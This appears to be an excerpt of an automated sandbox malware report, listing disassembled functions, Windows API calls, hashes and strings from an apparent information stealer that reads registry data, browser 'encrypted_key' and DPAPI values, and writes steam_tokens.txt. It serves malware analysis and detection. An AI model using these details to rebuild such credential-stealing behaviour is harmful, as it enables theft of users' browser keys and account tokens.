                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 7550dd6610b743046657cfad825c6434ab704e17789f9e743812bf873480c296
                            • Instruction ID: 7db9bcd3d8e27c66e83faec6f7e457d814bcbd6c601a7e220ef29684bdeef50e
                            • Opcode Fuzzy Hash: 7550dd6610b743046657cfad825c6434ab704e17789f9e743812bf873480c296
                            • Instruction Fuzzy Hash: F301F1B4600214BFD710CBA0DD48EAB7BADEB49741F100049FE4497341EAB0590887A0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00452895
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0045289C
                              • Part of subcall function 00452910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00452925
                              • Part of subcall function 00452910: RtlAllocateHeap.NTDLL(00000000), ref: 0045292C
                              • Part of subcall function 00452910: RegOpenKeyExA.ADVAPI32(80000002,00FEB6F0,00000000,00020119,004528A9), ref: 0045294B
                              • Part of subcall function 00452910: RegQueryValueExA.ADVAPI32(004528A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00452965
                              • Part of subcall function 00452910: RegCloseKey.ADVAPI32(004528A9), ref: 0045296F
                            • RegOpenKeyExA.ADVAPI32(80000002,00FEB6F0,00000000,00020119,00449500), ref: 004528D1
                            • RegQueryValueExA.ADVAPI32(00449500,00FFF718,00000000,00000000,00000000,000000FF), ref: 004528EC
                            • RegCloseKey.ADVAPI32(00449500), ref: 004528F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 74988934947fbbda32ca01f1dfdb70326c9d564f3e0c10a0618c339bb88e74d1
                            • Instruction ID: cd81fa2256b4bc9cc95ef9ddc381814a57339ff93ff266aa28a53dedd6826061
                            • Opcode Fuzzy Hash: 74988934947fbbda32ca01f1dfdb70326c9d564f3e0c10a0618c339bb88e74d1
                            • Instruction Fuzzy Hash: 5101A2B1640208BFDB10ABB4ED49EAA776EEB44316F00025AFE08D3251DAF49D4487A0
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 0043723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00437279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00437280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004372C3
                            • HeapFree.KERNEL32(00000000), ref: 004372CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00437329
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: 8c7f4e8b0cfbc9b17a210c648af944d8b108c6d4be8c55638bf712f7815c5723
                            • Instruction ID: aa5791660fc8f8593e66a88da70ce7c70cae169ff2882ce047d8603823744c82
                            • Opcode Fuzzy Hash: 8c7f4e8b0cfbc9b17a210c648af944d8b108c6d4be8c55638bf712f7815c5723
                            • Instruction Fuzzy Hash: 06418EB17046059BEB20CF69DC84BABB3E9FB88305F1455AAEC9DC7340E675E900DB54
                            APIs
                            • memset.MSVCRT ref: 0044D7D6
                            • RegOpenKeyExA.ADVAPI32(80000001,00FFE310,00000000,00020119,?), ref: 0044D7F5
                            • RegQueryValueExA.ADVAPI32(?,00FFF0E8,00000000,00000000,00000000,000000FF), ref: 0044D819
                            • RegCloseKey.ADVAPI32(?), ref: 0044D823
                            • lstrcat.KERNEL32(?,00000000), ref: 0044D848
                            • lstrcat.KERNEL32(?,00FFF1C0), ref: 0044D85C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: 02620483a9cf080f015603a337bb3ff61873f07f71b4e2726c76f8a1d18c6308
                            • Instruction ID: b438c268d874107c5aa21d434bb070d69544dbc71d917a1a7f8b44d8ec8290b8
                            • Opcode Fuzzy Hash: 02620483a9cf080f015603a337bb3ff61873f07f71b4e2726c76f8a1d18c6308
                            • Instruction Fuzzy Hash: 7A41D271A1020CAFDB14EF64EC82FDE7379AB48308F405169F90997251EE74AA85CFD4
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00439CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00439CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00439D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: 03927ab13433b5bb69938c8729761642a30f716d3bec5c0fa861bc2e49fa474b
                            • Instruction ID: b49fe8dd15442e6d5fb67a7e8ecb0a4c330a9ed79f71ed2c2ae5acfc4a1790cd
                            • Opcode Fuzzy Hash: 03927ab13433b5bb69938c8729761642a30f716d3bec5c0fa861bc2e49fa474b
                            • Instruction Fuzzy Hash: ED41D331A002099BCF21EF65DD426EFB7B4AF58308F04646AED15A7352DAB8ED04C798
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044EA24
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044EA53
                            • lstrcat.KERNEL32(?,00000000), ref: 0044EA61
                            • lstrcat.KERNEL32(?,00461794), ref: 0044EA7A
                            • lstrcat.KERNEL32(?,00FF9150), ref: 0044EA8D
                            • lstrcat.KERNEL32(?,00461794), ref: 0044EA9F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 19b95a5b6486dabc805b27e7b9b90f6bb8b5b5b6de83b3809747087d082f9c01
                            • Instruction ID: 0d575f7d3814f8b7cc75abfe564e0a70065157bb1456795f8ed8d72a9409759b
                            • Opcode Fuzzy Hash: 19b95a5b6486dabc805b27e7b9b90f6bb8b5b5b6de83b3809747087d082f9c01
                            • Instruction Fuzzy Hash: 9341C471A10218AFCB11EB65DD42FED7379BF8C300F0054ADFA1697290DEB49E449BA8
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044ECDF
                            • lstrlen.KERNEL32(00000000), ref: 0044ECF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044ED1D
                            • lstrlen.KERNEL32(00000000), ref: 0044ED24
                            • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0044ED52
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: steam_tokens.txt
                            • API String ID: 367037083-401951677
                            • Opcode ID: 6aa0cff1843997333f04cc070ceca1d576ae85bd3ad4988c394cffd34b342d51
                            • Instruction ID: 42768dec5fca2787c3b19dabcaacb9e80ed596dec451b3135427d29d94c9e9b4
                            • Opcode Fuzzy Hash: 6aa0cff1843997333f04cc070ceca1d576ae85bd3ad4988c394cffd34b342d51
                            • Instruction Fuzzy Hash: 4931B171B102055FD721BB7AED4AA6F7769AF44308F04212AF845CB212DBBCDC0587D9
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0043140E), ref: 00439A9A
                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0043140E), ref: 00439AB0
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,0043140E), ref: 00439AC7
                            • ReadFile.KERNEL32(00000000,00000000,?,0043140E,00000000,?,?,?,0043140E), ref: 00439AE0
                            • LocalFree.KERNEL32(?,?,?,?,0043140E), ref: 00439B00
                            • CloseHandle.KERNEL32(00000000,?,?,?,0043140E), ref: 00439B07
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 7223349bbc93929fbefd9b14a8067fda10562556fb7a09bb3beb5e9887df7873
                            • Instruction ID: ba47ce375ea554bfae91b27664b16e124708a3d5bec596681fb4d7834a4ce2bb
                            • Opcode Fuzzy Hash: 7223349bbc93929fbefd9b14a8067fda10562556fb7a09bb3beb5e9887df7873
                            • Instruction Fuzzy Hash: CD115171600209AFD710EF69DD84AABB36DFB08344F10125AF90197380DBB4AD50CBA4
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00455B14
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A188
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A1AE
                            • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00455B7C
                            • memmove.MSVCRT(00000000,?,?), ref: 00455B89
                            • memmove.MSVCRT(00000000,?,?), ref: 00455B98
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long
                            • API String ID: 2052693487-3788999226
                            • Opcode ID: e78ac724bf621d3ee9c435335a6144608f285e6cc0569da2dfbab5d99e6e7cca
                            • Instruction ID: 317fea2bad92b67d1b9e668cbba320fa464fb2f74d1d7996c1155275e57caa1c
                            • Opcode Fuzzy Hash: e78ac724bf621d3ee9c435335a6144608f285e6cc0569da2dfbab5d99e6e7cca
                            • Instruction Fuzzy Hash: 8D41A371B005189FCF18CF6CC995ABEB7B5EB89310F14822AE805E7345D634ED00CB94
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: b7465d2d798fdd0162d129fff1ad47e8d348e83b072adcf3e55365f1bca77b2f
                            • Instruction ID: 8682e11e0e9b1a82f9da917a1438ca555bb9405fb247e7234b97ba944ad051ce
                            • Opcode Fuzzy Hash: b7465d2d798fdd0162d129fff1ad47e8d348e83b072adcf3e55365f1bca77b2f
                            • Instruction Fuzzy Hash: 4E41167040075CEEEB218B248D85FFB7BFC9B45305F1448E9ED8686183E2759E498F28
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00447D58
                              • Part of subcall function 0045A1C0: std::exception::exception.LIBCMT ref: 0045A1D5
                              • Part of subcall function 0045A1C0: std::exception::exception.LIBCMT ref: 0045A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 00447D76
                            • std::_Xinvalid_argument.LIBCPMT ref: 00447D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$std::exception::exception
                            • String ID: invalid string position$string too long
                            • API String ID: 3310641104-4289949731
                            • Opcode ID: db7a791ea6cd7f3e9641fd9be2bf14fc6c8cedd7f9feb08dfc60de607633f0e7
                            • Instruction ID: 8be06c4f16577e81d31aa894e2f61ebe5677556fb9290f29797723cd3d764fb2
                            • Opcode Fuzzy Hash: db7a791ea6cd7f3e9641fd9be2bf14fc6c8cedd7f9feb08dfc60de607633f0e7
                            • Instruction Fuzzy Hash: 9721E4727146004BE720DE6CD880A3AB7E5EFA2751F204A2FE4428B341D774DC0687A9
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004533EF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 004533F6
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00453411
                            • wsprintfA.USER32 ref: 00453437
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB
                            • API String ID: 2922868504-2651807785
                            • Opcode ID: fa34b17db002dedfacdcb907588a08eed71456ce414b40cc1506c205be027f5b
                            • Instruction ID: 3e494677d988449b4b49dee46e1b27c840a2bfe5bfd512270a6d636a7fec22a9
                            • Opcode Fuzzy Hash: fa34b17db002dedfacdcb907588a08eed71456ce414b40cc1506c205be027f5b
                            • Instruction Fuzzy Hash: A001D8B1A04214AFDB14DFA8DD45B6EB7BDFB45711F10022AFD06E7380D7B85D0486A5
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlenmemset
                            • String ID:
                            • API String ID: 3212139465-0
                            • Opcode ID: 37bbeb9c2373bfbe659c2d782dd8df14e1821b5b2bc2257fbb9176aab56a4f7e
                            • Instruction ID: 96785b680e4dedbe994e6312e7edf762cbbec5c0efac935857beac322a2bf9e1
                            • Opcode Fuzzy Hash: 37bbeb9c2373bfbe659c2d782dd8df14e1821b5b2bc2257fbb9176aab56a4f7e
                            • Instruction Fuzzy Hash: 4881F671E003099BDB10CF94DD40BAEB7B5AF86305F14806FE904A7382E7B99D49CB98
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00447F31
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00447F60
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 00447FA5
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 00447FD3
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 00448007
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: d804c56d81fa31a0d6502287c6dd385c94ed8cf2802f2181d9112cf6fa729961
                            • Instruction ID: 6c31e44c8d1ffeb2b438a65c838659fa60835f1fa036895fd662faae341cb334
                            • Opcode Fuzzy Hash: d804c56d81fa31a0d6502287c6dd385c94ed8cf2802f2181d9112cf6fa729961
                            • Instruction Fuzzy Hash: B441A23060411ADFDB20DF68D480E9EB7B4FF58300F11419AE805D7351EB78AA67CBA6
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 004480BB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004480EA
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 00448102
                            • lstrlen.KERNEL32(00000000), ref: 00448140
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044816F
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 8a901a81d14678a0235852a61db3c9bc7fa7cb26eb3014155245201d70c8202a
                            • Instruction ID: f4c118f3707c4a44c2d9779dddcd854377a02898ea21f90275118b8ff696d9f0
                            • Opcode Fuzzy Hash: 8a901a81d14678a0235852a61db3c9bc7fa7cb26eb3014155245201d70c8202a
                            • Instruction Fuzzy Hash: 2C419C71600206ABEB21EF78D944BAFBBF4EF44300F11841EA946D7204EF78D946CB94
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00451B72
                              • Part of subcall function 00451820: lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0045184F
                              • Part of subcall function 00451820: lstrlen.KERNEL32(00FE6D00), ref: 00451860
                              • Part of subcall function 00451820: lstrcpy.KERNEL32(00000000,00000000), ref: 00451887
                              • Part of subcall function 00451820: lstrcat.KERNEL32(00000000,00000000), ref: 00451892
                              • Part of subcall function 00451820: lstrcpy.KERNEL32(00000000,00000000), ref: 004518C1
                              • Part of subcall function 00451820: lstrlen.KERNEL32(00464FA0), ref: 004518D3
                              • Part of subcall function 00451820: lstrcpy.KERNEL32(00000000,00000000), ref: 004518F4
                              • Part of subcall function 00451820: lstrcat.KERNEL32(00000000,00464FA0), ref: 00451900
                              • Part of subcall function 00451820: lstrcpy.KERNEL32(00000000,00000000), ref: 0045192F
                            • sscanf.NTDLL ref: 00451B9A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00451BB6
